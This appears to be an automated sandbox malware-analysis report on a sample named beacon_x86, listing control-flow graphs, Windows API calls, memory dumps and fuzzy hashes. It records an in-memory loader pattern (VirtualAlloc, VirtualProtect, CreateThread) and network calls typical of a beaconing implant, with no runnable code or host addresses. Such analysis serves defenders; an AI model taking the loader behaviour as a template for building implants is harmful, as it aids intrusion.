          • Opcode Fuzzy Hash: 6993ad00b22fa5709ddfae83127fd071b9715a62268548fc0a47211300f561df
          • Instruction Fuzzy Hash: E50160B4408701DFE3009F16D55C31BBEE1AB84749F00891DE5991A2A1C7BE864CCF9A

          Control-flow Graph

          APIs
          • GetACP.KERNEL32(00000000,00000000,00000080,?,?,?,?,?,?,?,?,00D604C0,00000000,00000000), ref: 00D67069
          • GetOEMCP.KERNEL32(?,?,?,?,?,?,?,?,00D604C0,00000000,00000000), ref: 00D67075
          • GetTickCount.KERNEL32 ref: 00D670A6
            • Part of subcall function 00D77C0A: __getptd.LIBCMT ref: 00D77C0F
          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00D604C0,00000000), ref: 00D670D3
          • _memset.LIBCMT ref: 00D67170
          • _memset.LIBCMT ref: 00D671AF
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$CountCurrentProcessTick__getptd
          • String ID:
          • API String ID: 2210316817-0
          • Opcode ID: 279e7ffc8da01ccef3fbb1eb0996711d583909bee549919bdfc8b19500f9fb47
          • Instruction ID: c53c75d157ba0bb2cadbdc629fc11144fe4978c858261f09f5efdccae1f57757
          • Opcode Fuzzy Hash: 279e7ffc8da01ccef3fbb1eb0996711d583909bee549919bdfc8b19500f9fb47
          • Instruction Fuzzy Hash: 7531B376900308BBDB11BBB5EC46EAE7BB8DF08324F184016F504EB292EE75D9848771

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 361 d67e51-d67e6e 362 d67e80-d67e82 361->362 363 d67e70-d67e75 call d777ff 361->363 365 d67e88 362->365 366 d67f99-d67fa0 362->366 367 d67e7a-d67e7b 363->367 368 d67e8d-d67e91 365->368 367->362 369 d67e97-d67e9f 368->369 370 d67f8e-d67f93 368->370 371 d67ea1-d67ed9 htonl recvfrom 369->371 372 d67f0e-d67f30 htonl ioctlsocket 369->372 370->366 370->368 373 d67ef2-d67ef4 371->373 374 d67edb-d67ee6 WSAGetLastError 371->374 375 d67f35-d67f38 372->375 376 d67f32 372->376 373->370 378 d67efa-d67f0c 373->378 374->370 377 d67eec-d67ef0 374->377 379 d67f5a-d67f5b 375->379 380 d67f3a-d67f3e 375->380 376->375 381 d67f5c-d67f6e call d602d0 377->381 382 d67f83-d67f8b call d602d0 378->382 379->381 380->370 383 d67f40-d67f58 call d674d4 380->383 381->370 382->370 383->379 390 d67f70-d67f75 383->390 390->370 391 d67f77-d67f7d 390->391 391->382
          APIs
          • _malloc.LIBCMT ref: 00D67E75
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • htonl.WS2_32(00D9F838), ref: 00D67EA1
          • recvfrom.WS2_32(?,00D9F838,000FFFFC,00000000,?,?), ref: 00D67ED0
          • WSAGetLastError.WS2_32 ref: 00D67EDB
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AllocateErrorHeapLast_mallochtonlrecvfrom
          • String ID:
          • API String ID: 987280018-0
          • Opcode ID: 07a40dc80aa8edb40906ed7ee7b59ab050936193d8c85fccd95526aa025e4969
          • Instruction ID: 3f86008b5b4c5539288eec971eb8b031d008c3f3e2dc30b47be9571463b9e50c
          • Opcode Fuzzy Hash: 07a40dc80aa8edb40906ed7ee7b59ab050936193d8c85fccd95526aa025e4969
          • Instruction Fuzzy Hash: 1641E271808208EFEB219FA4DC44FAAB7F5EF44328F24426AF511E22A0D770AD45CB71

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 392 d6031c-d60427 call d671bc call d67382 * 3 call d6b2f3 call d6b2dd call d6b2e8 call d6b2f3 * 2 call d777ff call d6b2e8 * 3 call d6b2dd call d6bb1c call d64c3e call d6da37 * 2 call d6286e 431 d6042e-d60441 call d6b2e8 call d628b1 392->431 432 d60429 call d6ce47 392->432 438 d60443 call d6ce47 431->438 439 d60448-d6044f call d628cc 431->439 432->431 438->439 443 d60456-d6045d call d62927 439->443 444 d60451 call d6ce47 439->444 448 d60464-d60494 call d6b2dd call d6b2e8 call d777ff 443->448 449 d6045f call d6ce47 443->449 444->443 457 d60496 call d6ce47 448->457 458 d6049b-d604c6 call d6b2e8 call d6da37 call d6b2e8 call d67060 448->458 449->448 457->458 468 d604c7-d604c8 458->468 469 d604ce-d6053e call d6bdfa call d77956 call d6bdfa call d77956 * 2 call d64c6a 468->469 470 d606ac-d606ca call d6bea0 call d77722 call d6ce47 468->470 489 d60540-d60545 469->489 490 d6055f-d60592 call d6173c call d6b2e8 call d61e3d 469->490 492 d60548-d6054d 489->492 502 d60594-d605a2 call d6acc5 490->502 503 d605bd-d605c0 490->503 492->492 494 d6054f-d60551 492->494 494->490 496 d60553-d6055e call d65072 494->496 496->490 511 d605a4-d605b0 call d6936c 502->511 512 d605b2-d605b5 502->512 505 d605c2 call d67fa1 503->505 506 d60628 503->506 510 d605c7-d605d1 call d6b2e8 505->510 508 d60630-d6063c call d61874 call d6286e 506->508 524 d60643-d60657 call d6be28 508->524 525 d6063e call d6ce47 508->525 520 d605d3-d605d8 510->520 521 d605da 510->521 511->503 512->503 523 d605df-d605f6 call d63f55 call d66853 call d66017 call d6286e 520->523 521->523 551 d605fd-d60604 523->551 552 d605f8 call d61fb7 523->552 531 d6065e-d60666 524->531 532 d60659 call d6ce47 524->532 525->524 531->470 535 d60668-d6066f 531->535 532->531 537 d60671-d6067f 535->537 538 d6069a-d6069b call d644a0 535->538 540 d60692 537->540 541 d60681 call d6200f 537->541 544 d606a0-d606a7 538->544 546 d60694-d60696 540->546 548 d60686-d60690 541->548 544->468 546->538 549 d60698 546->549 548->546 549->538 551->508 553 d60606-d60626 call d61874 call d6173c call d61962 551->553 552->551 553->508
          APIs
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671D2
          • _malloc.LIBCMT ref: 00D603B2
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
            • Part of subcall function 00D6BB1C: __time64.LIBCMT ref: 00D6BB28
            • Part of subcall function 00D6BB1C: _malloc.LIBCMT ref: 00D6BB71
            • Part of subcall function 00D6BB1C: _memset.LIBCMT ref: 00D6BB8F
            • Part of subcall function 00D6BB1C: _strtok.LIBCMT ref: 00D6BBB4
            • Part of subcall function 00D6BB1C: _strtok.LIBCMT ref: 00D6BBE6
            • Part of subcall function 00D64C3E: __time64.LIBCMT ref: 00D64C4B
            • Part of subcall function 00D6DA37: _malloc.LIBCMT ref: 00D6DA5E
            • Part of subcall function 00D6DA37: _memset.LIBCMT ref: 00D6DA8C
            • Part of subcall function 00D6DA37: _realloc.LIBCMT ref: 00D6DA6D
          • _malloc.LIBCMT ref: 00D60486
          • __snprintf.LIBCMT ref: 00D604E8
          • __snprintf.LIBCMT ref: 00D60507
          • __snprintf.LIBCMT ref: 00D60525
            • Part of subcall function 00D6CE47: Sleep.KERNEL32(000003E8,00000000,00000000,00000080,00D606C4), ref: 00D6CE84
            • Part of subcall function 00D6CE47: RtlExitUserThread.NTDLL(00000000,00000000,00000000,00000080,00D606C4), ref: 00D6CE8E
            • Part of subcall function 00D6CE47: WaitForSingleObject.KERNEL32(00000000,00000000,00000080,00D606C4), ref: 00D6CEAF
            • Part of subcall function 00D6173C: InternetOpenA.WININET(00D60572,00000003,00000000,00000000,00000000), ref: 00D617C2
            • Part of subcall function 00D6173C: InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,00D9EFC4), ref: 00D61809
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc$__snprintf$Internet__time64_memset_strtok$AllocateConnectExitHeapObjectOpenSingleSleepThreadUserWait_realloc
          • String ID:
          • API String ID: 2723191398-0
          • Opcode ID: 0fc62eb2e5f61a308aded6a1ad1fd8d461f2b50c1acf24674899fff0a5f2ba0c
          • Instruction ID: 52c5faac091d1ac11094eeaf512a0cccbf09f1261205c6538164fd06fb80db18
          • Opcode Fuzzy Hash: 0fc62eb2e5f61a308aded6a1ad1fd8d461f2b50c1acf24674899fff0a5f2ba0c
          • Instruction Fuzzy Hash: 5B9105719483006BD6207B759C03B2F7BE8EF84724F14091AF588EA2D2EF75CD408AB6

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 561 40156c-40159d VirtualAlloc 562 40159f-4015a1 561->562 563 4015a3-4015b8 562->563 564 4015ba-40161b call 401539 VirtualProtect CreateThread 562->564 563->562
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: Virtual$AllocCreateProtectThread
          • String ID:
          • API String ID: 3039780055-3916222277
          • Opcode ID: 7116a479f18e8398ab62b384885a83961a77cbf5e6f43067b0417bc4564eeb7b
          • Instruction ID: e62f9da5006a8b60ac6d7aa8aa559fb842e3793d0c2f75f38c45ec490f2c7fc1
          • Opcode Fuzzy Hash: 7116a479f18e8398ab62b384885a83961a77cbf5e6f43067b0417bc4564eeb7b
          • Instruction Fuzzy Hash: FD1148B0408304AFD700AF25C48835EBFF4EB88358F40C86EE9998B391D37984098B92

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 567 d8511c-d8512f call d7a3a4 570 d8515f-d8516a 567->570 571 d85131-d8513e 567->571 573 d8516c-d8516e 570->573 574 d8516f-d85177 570->574 571->570 572 d85140-d85155 call d79641 call d7b5da 571->572 598 d85158-d8515a 572->598 573->574 576 d85179-d85180 574->576 577 d851e2-d851e4 574->577 578 d851cd-d851cf 576->578 579 d85182-d85194 576->579 581 d85232 577->581 582 d851e6-d851ec 577->582 578->581 586 d851d1-d851e0 RtlAllocateHeap 578->586 579->578 583 d85196-d851be call d798aa call d7a0bc call d85218 579->583 584 d85234-d85239 call d7a3e9 581->584 587 d851ee-d851f7 call d7a77f 582->587 588 d85221-d85223 582->588 583->586 605 d851c0-d851ca call d7f520 583->605 586->577 587->574 599 d851fd-d85202 587->599 588->581 591 d85225-d8522a 588->591 591->581 596 d8522c 591->596 596->581 598->584 599->598 601 d85208-d8520e 599->601 601->598 605->578
          APIs
          • __lock.LIBCMT ref: 00D85198
          • ___sbh_alloc_block.LIBCMT ref: 00D851A4
          • _memset.LIBCMT ref: 00D851C5
          • RtlAllocateHeap.NTDLL(00000008,?,00D92A60), ref: 00D851DA
            • Part of subcall function 00D79641: __getptd_noexit.LIBCMT ref: 00D79641
            • Part of subcall function 00D7B5DA: __decode_pointer.LIBCMT ref: 00D7B5E5
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AllocateHeap___sbh_alloc_block__decode_pointer__getptd_noexit__lock_memset
          • String ID:
          • API String ID: 3771094184-0
          • Opcode ID: 6f402446c9fda7c28814a394659092e83d4457745665258b7121ff971ab6ad03
          • Instruction ID: 7a731ad8a0da64dc45584a48f7e0bd8b4c8718837b770e6dff36288635d2f8e2
          • Opcode Fuzzy Hash: 6f402446c9fda7c28814a394659092e83d4457745665258b7121ff971ab6ad03
          • Instruction Fuzzy Hash: 8221F871900B04ABCF21BF68EC84B5E77A1EB81760F288215F86D9F299E7318D408B75
          APIs
          • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00819E52,75570A60,?,?,?,?), ref: 0081A3A9
          Strings
          Memory Dump Source
          • Source File: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_3_810000_beacon_x86.jbxd
          Yara matches
          Similarity
          • API ID: LibraryLoad
          • String ID: `Wu$`Wu
          • API String ID: 1029625771-1095923640
          • Opcode ID: 921837ef3eb67de63abac7cb5666c735ab802cdd6b7f1449a49ae73ad87c3da8
          • Instruction ID: 41a2b7ba6204635937b20b22dcc3b823b1bae77c7609f1661a9c2df382119a58
          • Opcode Fuzzy Hash: 921837ef3eb67de63abac7cb5666c735ab802cdd6b7f1449a49ae73ad87c3da8
          • Instruction Fuzzy Hash: 3651A1B5A0121ADFCB08CF88C894AEEB7B6FF88304F148159E915AB351C774AE51CF95

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 623 401296-4012a2 625 4012a4 623->625 626 4012b8-4012c5 623->626 627 4012a8-4012b1 625->627 630 4012c7-4012d0 626->630 631 4012db-4012fb malloc 626->631 627->626 629 4012b3-4012b6 627->629 629->626 629->627 632 4012d6 630->632 633 4013b8-4013bc 630->633 634 401301-40130d 631->634 635 401483 631->635 632->631 633->632 636 401310-401344 strlen malloc memcpy 634->636 638 40148b-40149a exit 635->638 636->636 637 401346-401393 call 401960 call 4029e0 636->637 637->638 643 401399-4013a1 637->643 644 4013a7-4013b2 643->644 645 401448-40145d _cexit 643->645
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: malloc$memcpystrlen
          • String ID:
          • API String ID: 3553820921-0
          • Opcode ID: 948a088ca798df2e7dce449238bcaf35f26902c4bc7ea522de66c663b67a1438
          • Instruction ID: 2b272e4b46966ba8deed0fafeb192a19a89914a185c4b83b395d914033f718ae
          • Opcode Fuzzy Hash: 948a088ca798df2e7dce449238bcaf35f26902c4bc7ea522de66c663b67a1438
          • Instruction Fuzzy Hash: CB3136B9A003058FCB10DF65E98075ABBF1FB44705F14853ED988A73A2E778E945CB89
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: malloc$memcpystrlen
          • String ID:
          • API String ID: 3553820921-0
          • Opcode ID: f5e0c9adc78a94dab72ef4a8ccb92d4597cac7524235f195ea0d1421677b0eb4
          • Instruction ID: 9b3cccf6e9dd94e7ac684493c2e87501ce7787e5f0140ca7f17ca5cac32b3744
          • Opcode Fuzzy Hash: f5e0c9adc78a94dab72ef4a8ccb92d4597cac7524235f195ea0d1421677b0eb4
          • Instruction Fuzzy Hash: EF2112B8A003058FCB10DF69E880659BBF0FB48705F10843ED988A73A2E774A945CB89
          APIs
          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00819DE6,?,00819DE6,75570A60), ref: 0081A98D
          Strings
          Memory Dump Source
          • Source File: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_3_810000_beacon_x86.jbxd
          Yara matches
          Similarity
          • API ID: AllocVirtual
          • String ID: `Wu$`Wu
          • API String ID: 4275171209-1095923640
          • Opcode ID: 06db9e082881e3a7de2518e710500035fed678b226e83921418e753830c2cfca
          • Instruction ID: 5a07b65beb34dd738c66c404dc9a7339ee08dc7ce7d8113f7b21b486924b591e
          • Opcode Fuzzy Hash: 06db9e082881e3a7de2518e710500035fed678b226e83921418e753830c2cfca
          • Instruction Fuzzy Hash: 8E31DF74A01109AFCB08CF99C894AAEB7B5FF88314F11C159E559AB354D730AE91CF91
          APIs
            • Part of subcall function 00D61E6E: WSAStartup.WS2_32(00000202,?), ref: 00D61E8F
            • Part of subcall function 00D61E6E: WSACleanup.WS2_32 ref: 00D61E99
          • WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 00D61F3F
          • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,00000001,00000000,00000000), ref: 00D61F6A
          • closesocket.WS2_32(00000000), ref: 00D61FA9
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CleanupIoctlSocketStartupclosesocket
          • String ID:
          • API String ID: 1100289767-0
          • Opcode ID: 40205f3e79af7936fb7c625739f3a144d8e9c7c9d77be54b017143f6e346c1c0
          • Instruction ID: 96aec82abb6b5ce3994d3ee241e2b98857468fea8fe3fe09f339dce1b8734720
          • Opcode Fuzzy Hash: 40205f3e79af7936fb7c625739f3a144d8e9c7c9d77be54b017143f6e346c1c0
          • Instruction Fuzzy Hash: 7D11E736A412187BE7208A65CC49FEB7F6DDF857A1F188022FA09D2181D775884186B0
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: File$CloseCreateHandleRead
          • String ID:
          • API String ID: 1035965006-0
          • Opcode ID: de8e7562ff60837e5b68acacff60a59f894b3ed398b1beaf9885a2a007807793
          • Instruction ID: 13578ad0072e5758c11d0cf9d06b5e6b01679b076f79182928bb53a60008478f
          • Opcode Fuzzy Hash: de8e7562ff60837e5b68acacff60a59f894b3ed398b1beaf9885a2a007807793
          • Instruction Fuzzy Hash: 811157B58083059FC700AF29C54835FBBF4EF84364F00892EE895973A2D3B989498FD6
          APIs
          • _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • _malloc.LIBCMT ref: 00D671D2
          • _memset.LIBCMT ref: 00D671EF
            • Part of subcall function 00D77722: __lock.LIBCMT ref: 00D77740
            • Part of subcall function 00D77722: ___sbh_find_block.LIBCMT ref: 00D7774B
            • Part of subcall function 00D77722: ___sbh_free_block.LIBCMT ref: 00D7775A
            • Part of subcall function 00D77722: HeapFree.KERNEL32(00000000,?,00D925A0,0000000C,00D7988B,00000000,00D92700,0000000C,00D798C5,?,?,?,00D8519D,00000004,00D92A60,0000000C), ref: 00D7778A
            • Part of subcall function 00D77722: GetLastError.KERNEL32(?,00D8519D,00000004,00D92A60,0000000C,00D80868,?,?,00000000,00000000,00000000,?,00D7C749,00000001,00000214), ref: 00D7779B
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Heap_malloc$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock_memset
          • String ID:
          • API String ID: 1561657895-0
          • Opcode ID: c8e9cba292c0deaefcb227626c1a5d494f7b07ad7ba5e871b60a28f1e5f06bb6
          • Instruction ID: f84ccb30253143ec6081c95843bb62e7cb1e717d146f60e916add463210dfdb0
          • Opcode Fuzzy Hash: c8e9cba292c0deaefcb227626c1a5d494f7b07ad7ba5e871b60a28f1e5f06bb6
          • Instruction Fuzzy Hash: 1DE0923B60811937CA263A69DC12F9F2E1ACF867B4F248429F90C5A141EE11890152F5
          APIs
          • malloc.MSVCRT ref: 004017BB
          • Sleep.KERNELBASE ref: 004017C9
            • Part of subcall function 00401700: CreateFileA.KERNELBASE ref: 0040174D
            • Part of subcall function 00401700: ReadFile.KERNELBASE ref: 0040177D
            • Part of subcall function 00401700: CloseHandle.KERNEL32 ref: 0040178D
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: File$CloseCreateHandleReadSleepmalloc
          • String ID: (0@
          • API String ID: 4248373497-1619376425
          • Opcode ID: 6845ea8dd48fab404a2061b438f8f23c871c7f7415dcaaf50ff1d80553ea92f3
          • Instruction ID: c18dacc817dc4ff119a69da04305d567d0d6ae5b32f5fd65705d0832059cd44e
          • Opcode Fuzzy Hash: 6845ea8dd48fab404a2061b438f8f23c871c7f7415dcaaf50ff1d80553ea92f3
          • Instruction Fuzzy Hash: 9AF0F8B4A053009BC700EF7ADA8551ABBE8BB08345F41483DA684E7391D678D9008B1A
          APIs
          • InternetOpenA.WININET(00D60572,00000003,00000000,00000000,00000000), ref: 00D617C2
          • InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,00D9EFC4), ref: 00D61809
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Internet$ConnectOpen
          • String ID:
          • API String ID: 2790792615-0
          • Opcode ID: 4600c0c81b65e5040c9b2ba6ee14ac2c7018b4e2d675a474286dfd535db31956
          • Instruction ID: a55b671e104d52d6d2f3eb1a42486f73b916a55b56222a3a6c80350e0d67d988
          • Opcode Fuzzy Hash: 4600c0c81b65e5040c9b2ba6ee14ac2c7018b4e2d675a474286dfd535db31956
          • Instruction Fuzzy Hash: 6731C375580344BBEA356B26AC1BF6F3F6DEB85B20F18001BF600D91E1DFB589809A75
          APIs
          • WSAStartup.WS2_32(00000202,?), ref: 00D61E8F
          • WSACleanup.WS2_32 ref: 00D61E99
            • Part of subcall function 00D77EDE: _doexit.LIBCMT ref: 00D77EEA
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CleanupStartup_doexit
          • String ID:
          • API String ID: 3413891862-0
          • Opcode ID: 602fc413920f090239d4881da17fb1f8cebedb0955f0e248cc94b0841a861675
          • Instruction ID: 7a3a98242a292084aa6e01ee30bdcd71bf48f2f2e71b4687c9cc9cf9fe51b4a1
          • Opcode Fuzzy Hash: 602fc413920f090239d4881da17fb1f8cebedb0955f0e248cc94b0841a861675
          • Instruction Fuzzy Hash: 38016D71D4431497D724AF79BC167587BE8BB09B12F14012BF604CA2D1DB7482C1CBB9
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _calloc
          • String ID:
          • API String ID: 1679841372-0
          • Opcode ID: f1a631400b695e4e9ebeb96205b47cc74500cf8837b1979b1f339c8b83b988ec
          • Instruction ID: 2ee62540e63d471a0d78a538b2217a667209576defd476b2bb0659c06fe253b9
          • Opcode Fuzzy Hash: f1a631400b695e4e9ebeb96205b47cc74500cf8837b1979b1f339c8b83b988ec
          • Instruction Fuzzy Hash: CBA16BB1900608EFDF219F95DC45EEEBBB6FF89300F108159F545AA2A1E3729940DF20
          APIs
          • HeapDestroy.KERNEL32(?), ref: 00D69874
            • Part of subcall function 00D6B67F: _memset.LIBCMT ref: 00D6B69D
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: DestroyHeap_memset
          • String ID:
          • API String ID: 3970643317-0
          • Opcode ID: 5d4c44244e9d0eac94ed1e8e1e080913612e6c05544c1aab2726686839a25913
          • Instruction ID: 07779b6de0a3f1f53af445a77ca44f6eab8bd48dec0b99aa5d7ce9bc855622d3
          • Opcode Fuzzy Hash: 5d4c44244e9d0eac94ed1e8e1e080913612e6c05544c1aab2726686839a25913
          • Instruction Fuzzy Hash: 6911C4328102059BDB24EB68D865EBEB76CDF23324F184026E44097155DB31ED81E6B0
          APIs
          • _malloc.LIBCMT ref: 00D64664
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
            • Part of subcall function 00D6DA37: _malloc.LIBCMT ref: 00D6DA5E
            • Part of subcall function 00D6DA37: _memset.LIBCMT ref: 00D6DA8C
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc$AllocateHeap_memset
          • String ID:
          • API String ID: 3655941445-0
          • Opcode ID: 45f6754b8125ea83e4ecc507940837133310b93bcecf199b38bdf54ccdfe09f1
          • Instruction ID: 6bfce6c982c1f7bfdc1da07806481ff19b4155fa932617db4322f7484c3fbd16
          • Opcode Fuzzy Hash: 45f6754b8125ea83e4ecc507940837133310b93bcecf199b38bdf54ccdfe09f1
          • Instruction Fuzzy Hash: DFF0A071E44361EBE720BFA0AC42F8A7BA5EF05720F02081BF418DB2C2DA60088187B5
          APIs
          • _malloc.LIBCMT ref: 00D72EFE
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
